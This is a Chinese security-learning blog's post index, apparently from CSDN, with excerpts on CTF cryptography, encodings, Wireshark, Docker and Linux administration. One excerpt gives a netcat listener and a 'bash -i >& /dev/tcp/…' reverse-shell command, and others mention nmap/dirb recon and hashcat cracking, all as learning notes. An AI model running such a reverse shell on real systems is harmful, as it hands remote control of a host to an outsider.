- 博客(36)
- 收藏
- 关注
RSS订阅原创 [De1CTF2019]xorz 的一点的我的笨解法
那么就利用结果是字母,那么就存在有空格的可能性,为了更直观的展示many_time_pad的攻击过程 ,这里尝试使用python 中的二维数组,c代表密文,m代表明文,flag是密钥,如果数组元素为0代表未知。Space_i_j这里表示明文中第i行第j列的空格的的可能性,这个数值最大,则当前位置的明文m[i][j]的空格的可能性就越大。第五段代码 ,设定一个阈值,通常上为行数6%,如这里是20行,设定12(设定小一点,可能会有错,设定大一点,可能会出现很多问号,无法确定)。第三段代码,一个判断字母的函数。
2024-12-18 12:15:06
464
原创 [RoarCTF2019]babyRSA-阶乘取模(威尔逊定理)
这里阶乘不可直接使用,所以将其拆分 B1比A1略小一点所以,可以。#分子直接追加至A1-1的阶乘,以方便使用威尔逊定理。#根据威尔逊定理,前一项替换掉,后面若干项保留。#三个项的欧拉函数使用下面的方法。#由C1和C2 得到p 和q。#使用for循环,计算出C1。#根据题意可定义一下C1。#分母用逆元来替换,
2024-05-05 21:47:06
674
原创 BASE64图片编码
import base64f1=open("home.png",'rb')f2=open("pic.txt",'wb')data=f1.read()database64=base64.b64encode(data)f2.write(database64)f1.close()f2.close()
2021-10-18 09:10:30
398
原创 一道CTF题 you raise me up
一道 2020网鼎杯的题:有这么一道题,名为 you raise me up给的代码是这样的其实就是 m 的 flag 次方 模 n 值为 c现在的情况是m 已知,c也已知然后求 flag这是一种求离散对数的题,flag 可以用离散对数的形式给出, C mod nflag = log msage是一个开源的数学软件 ,可支持大数运算,其中 有一个函数为 discrete...
2020-05-12 14:19:24
1382
1
原创 NTFS文件系统的DBR与DBR的备份
当winhex 打开磁盘时,可以看到磁盘中含有的若干个分区,如图当我们打开其中的NTFS分区 ,分区3 时,其实 它比我们直接打开逻辑驱动器要多几个扇区,如图前者的扇区总数为27085832,而后者则为27085840 正好是8扇区,一个簇的大小。其实,我们在硬盘0,分区3的最后一个扇区,可以看到NTFS的DBR的备份扇区,而驱动器F:则是没有NTFS的DBR备...
2020-03-30 21:16:08
4267
原创 tar.gz.sig 和tar.gz 如何配合使用
第一步: 从http://alpha.gnu.org/gnu/grub/下载 [ ]grub-2.04~rc1.tar.gz.sig 和grub-2.04~rc1.tar.gz第二步: 转到下载目录后,gpg –verify sig文件 原文件第三步: 复制出其中的key 即 E53D497F3FA42AD8C9B4D1E835A93...
2020-02-25 22:33:35
4253
原创 关于编码
1、很早以前,人们发现8 个晶体管在一起,最为稳定,于是称8个位为一个“字节”2、8个字节,可以有256个不同状态,美国人把0-127用来存储大小写英文字母、数字及一些符号。这就是ASCII3、后来,各个国家也开始使用计算机,他们觉得127个编码不够,就把128-255也用起来了,这就是ASCII 的扩展字符集。4、即便是这样,还是不够,等到中国人用的时候,远远不够,于是国人把128-2...
2019-09-24 10:31:09
122
原创 netcat 反弹shell
第一种情况:用 bash -i客户机:netcat -l -p 7777服务器(被黑主机):bash -i >& /dev/tcp/192.168.227.1/7777 0>&1>& 后面跟上/dev/tcp/ip/port 这个文件代表将bash -i 的标准输出和标准错误输出 重定向到 这个文件(描述符)。(其实有点像个通道)0>...
2019-09-18 14:49:12
398
原创 gmpy2笔记
# Encoding=UTF-8import gmpy2# gmpy2.mpz(x)# 初始化一个大整数xgmpy2.mpfr(x)# 初始化一个高精度浮点数xC = gmpy2.powmod(M,e,n)# 幂取模,结果是 C = (M^e) mod nd = gmpy2.invert(e,n) # 求逆元,de = 1 mod ngmpy2.is_prime...
2019-09-14 22:28:51
10788
原创 gmpy在kali下的安装手记
由于使用大数、素数等内容,需要有gmpy2,然后python下import gmpy2 总是报错,于是上网查了一下资料,最终解决,不过好像最后一招挺土的。在pip install gmpy2 时的报错,提示需要安装mpfr和mpc 于是从网上找,安装适合版本的。先从ftp://ftp.gnu.org/gnu/mpfr中下载mpfr_4.02.zip解压chmod 777 ....
2019-09-14 10:05:26
914
原创 affine ciphers
仿射密码, y=ax+b 加密过程如下ssss='abcdefghijklmnopqrstuvwxyz'l=len(ssss)output=1a=3b=7for i in range(l): # print(ssss[i]) # print('****************************') if((ord(ssss[i])>=97) a...
2019-09-13 14:42:12
248
原创 关于BASE编码 16 32 36 58 64 58 91
base编码有很多种,常用的有:base16 base32 base64 base85base36 base 58 base91还有base 92前面几种16、32,64、85 可以用 base64来调用不过得先pip install base64然后 import base64调用时,有统一的格式,base64.bXXencode或base64.b...
2019-09-13 11:59:50
4854
2
原创 angr的一道题
第一步,把文件下载下来进行解压缩,解出来的文件 ,文件名为re3.ppp 。可以把它复制到linux 系统中(我这里直接用kali 的),查看得知它是一个ELF 32位可执行程序。如图1所示。图1 查看re3.ppp的文件类型第二步,将re3.ppp 改为可执行。然后执行一下试试。发现它真的是一个需要输入四位数字的小程序,如果输错了数字程序出现wrong的反馈,如图2所示。...
2019-08-29 13:06:20
346
1
原创 关于HTTP协议的首部
Http报文包含内容 : 报文首部 空行CRLF 报文主体请求报文 方法+URI+ 协议 版本 请求首部字段 内容实体其中:请求方法: GET 请求 POST 实体传输 ...
2019-08-14 11:24:54
194
原创 CTF 2019-7-26 笔记
第一步, nmap -sV 192.168.0.1 扫描 服务信息 找到已经打开的端口。第二步, 浏览器 192.168.0.1:31337 探看页面源代码。 找到可能的隐藏的文件。第三步,探测端口信息 dirb http://192.168.0.1:31337/ 别忘了最后的"/" 可以探测到隐藏...
2019-07-27 06:37:53
313
原创 关于SUID SGID
关于SUID SGIDsetuid(suid):针对命令和二进制程序的,当普通用户执行某个(passwd)命令的时候,可以拥有这个命令对应用户的权限, 即让普通用户可以以root用户的角色执行程序或命令。setgid(sgid):希望一个目录被多个用户(同属于一个组)共享,同一个组的用户可以处理如:passwd 这个文件的属组是root,表示只有root用户可以访问的文件,为...
2019-07-26 22:59:32
496
原创 find 命令
find 命令使用时若要使用通配符,则 要加引号find /etc -name "*.conf"find /etc -type f -name "*.conf"
2019-06-18 14:09:20
587
转载 将kali安装至U盘的补充
https://blog.youkuaiyun.com/yyp12321/article/details/82624777之后,使用U盘启动以后,可能出现 /dev/sda无法找到的情况,这时,可以通过更改启动配置文件(启动菜单出现时按e键进入)更正,如果机器中已经硬盘一个,则U盘为sdb,如果有两个则为sdc,如果没U盘则为sda 也就不需要更改了。改好以后,按F10保存退出,就可以启动了!...
2019-06-04 12:37:19
461
原创 桥接
1、备份eth0的脚本2、去掉eth0 的 地址相关4行 IPADDR PREFIX GATEWAY DNS13、可查看到设备类型 TYPE=Ethernet4、添加BRIDGE= "桥接设备的名称" 如 br05、 创建 br0 桥接设备 ifcfg-br0 其中 有四行来自eth0 DEVICE="br0" NM_CON...
2019-06-03 11:05:09
177
原创 hashcat 使用
使用字典破解密码时,出现以下not a native intel openCL runtime加上参数 --force后可执行。另,输出文件 没在cracked.txt中,而是在hashcat.potfile中可用find /root -name "hashcat.potfile另外下载的2019年5月17日的kali的版本,默认情况下,执行hashcat 时也...
2019-05-30 21:47:32
3937
原创 netstat windows 下用
Netstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据,一般用于检验本机各端口的网络连接情况。以下是其在Windows 操作系统下的用法参数,常用的主要有:NETSTAT [-a] [-b] [-e] [-n] [-o] [-p proto] [-r] [-s] [-v] [interval] -a显示所有连接和监听端口。...
2019-03-21 13:51:17
267
原创 虚拟机的U盘启动。
当虚拟机使用U盘进行启动时,首先,将U盘以第二硬盘的形式进行添加,在选择文件时,选择“高级”,然后使用 physical1 或者physical2,如果有多个可以选择的话,此处的physical 1即是系统中的U盘设备,这个可以在计算机(或我的电脑)的“管理”中的磁盘管理器里找到,U盘前面若有两个硬盘 ,磁盘0 即physical 0 磁盘1 为physical 1 U盘,即为physic...
2018-12-10 20:41:16
1298
原创 网络丢包闹出的笑话:
网络丢包闹出的笑话:一个出差的丈夫一早给妻子发了一个消息 “I had a wonderful night, and really wish you were here”结果 ,最后一个"e" 没有收到。然后…………...
2018-11-23 21:05:52
640
1
原创 wireshark 学习笔记 -2
wireshark 统计功能端点统计 statistics -> endpoints会话统计statistics -> conversations协议分层statistics -> protocol Hierarchy Statistics简略显示的名字解析显示功能MAC地址解析网络名解析传输层解析统计包的长度的问题可用来猜测流量的用途等跟踪T...
2018-11-21 20:38:54
134
原创 wireshark 学习笔记-1
1、wireshark 是个什么样的软件免费,广泛使用,跨平台。2、怎么去用wireshark 端口镜像 首选 集线器输出 碰撞性大 网络分流器 需要额外设备 ARP缓存 有点不安全 直接安装 有点占资源。3、捕获文件 Pcap 合并捕...
2018-11-21 20:37:50
204
原创 wireshark 中的BPF基元
• host id , dst host id , src host id• net id , dst net id , src net id• ether host id , ether dst host id , ether src host id• port id , dst port id , src port id• gateway id , ip proto id , eth...
2018-11-21 19:27:18
333
原创 与wireshark 有关 读林沛满的书,心得
wireshark 使用技巧:1、Linux 在使用SSH进行登录时,有时会有约10秒种的停顿时间, 使用wireshark探知原因: 在SSH服务器收到SSH登录请求时,会去查询客户端IP地址所对应的DNS的PTR记录。一共尝试2次,每次约5秒种时间,若尝试失败,则不再尝试。 在SSH配置文件 /etc/ssh/ssd_config 中,有一句: ...
2018-11-19 21:07:49
1088
转载 ubuntu下部署带认证的私有dockerregistry 我的体会
ubuntu下部署带认证的私有dockerregistry(原创请注明出处)2016年05月25日10:56:01阅读数:2465author: zqh date: 2016-5-11 介绍Docker仓库实际上提供两方面的功能,一个是镜像管理,一个是认证。前者主要由docker-registry项目来实现,通过http服务来上传下载;后者可以通过docker-index(闭源)项目或者利用现...
2018-06-06 17:49:43
487
原创 通过ftp 工具 实现内网服务器的访问(需有外网转发节点)
1、服务器端, Linux centos 下载工具 frp https://github.com/fatedier/frp/releases 选择相应的版本2、tar解压缩 tar -zxvf frp_0.20.0_linux_amd64.tar.gz3、编辑配置文件 服务端: 设置好参数在frps.ini中写入:[common]bind_addr=0.0.0.0bind_...
2018-06-06 17:48:36
2525
原创 centos 7 上安装registry服务
安装服务 yum install docker开启可用,并启动服务 systemctl docker enable systemctl docker start下载镜像 docker pull registry:2运行镜像容器 docker run -d -p 5000:5000 --restart=always -v /opt/...
2018-06-02 21:58:56
1205
原创 关于firewall-cmd
1、源于 firewallD中2、将包括netfilter防火墙模块卸载与重载新配置等。3、动态管理防火墙 使用firewall daemon4、有图形界面的工具 firewall-config 和firewall-cmd 控制5、各种命令: firewall-cmd --state 查询获取状态 firewall-cmd --reload 重载防火墙 firewall-cmd -...
2018-05-21 16:09:08
490
原创 yum 源的设置
阿里云yum 源 http://mirrors.aliyun.com/repo/Centos-7.repo 网易云yum 源http://mirrors.163.com/.help/CentOS7-Base-163.repo将其下载后,将原来的 /etc/yum.repos.d/CentOS-Base.repo 替换,即成(最好,在替换前,先将其进行备份)另,可执行yum makecache 来...
2018-05-21 13:30:13
220
原创 Linux 查看本机系统信息。
1、查看系统简单信息[root@localhost ~]# unameLinux2、查看本机电脑及操作系统 信息。[root@localhost ~]# uname -aLinux localhost.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linu...
2018-05-21 11:25:26
9806
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人